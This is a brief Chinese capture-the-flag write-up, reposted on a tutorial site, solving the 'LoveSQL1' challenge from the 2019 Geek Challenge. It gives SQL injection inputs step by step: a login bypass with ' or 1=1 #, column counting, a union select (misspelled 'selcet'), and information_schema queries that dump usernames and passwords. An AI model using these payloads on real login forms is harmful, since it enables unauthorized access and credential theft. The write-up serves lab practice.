[极客大挑战 2019]LoveSQL1

本文主要是介绍[极客大挑战 2019]LoveSQL1，对大家解决编程问题具有一定的参考价值，需要的程序猿们随着小编来一起学习吧！

一道难度不大的基础题。。。

用' or 1=1 #来登录绕过（密码随便）

成功进入页面

先测试他能显示结果能有多少列（'order by 1#）//从一开始慢慢试，这里最多显示3行

知道能显示3行，那么用' union selcet 1,2,3可以看到显示为。（说明2，3行能显示内容）

接下来就很简单了，需要探的信息直接改变2，3 的值。如图用database()来获取数据库名

(select group_concat(table_name) from information_schema.tables where table_schema='geek')
//查询数据库里面的表名

(select group_concat(column_name) from information_schema.columns where table_schema='geek' and table_name='l0ve1ysq1')
//查询相关的列名

group_concat(concat_ws(id,username,password)) from geekuser

group_concat(concat_ws(id,username,password)) from l0ve1ysq1

用这俩来查讯表内的内容，就能查到flag

这篇关于[极客大挑战 2019]LoveSQL1的文章就介绍到这儿，希望我们推荐的文章对大家有所帮助，也希望大家多多支持为之网！

Java教程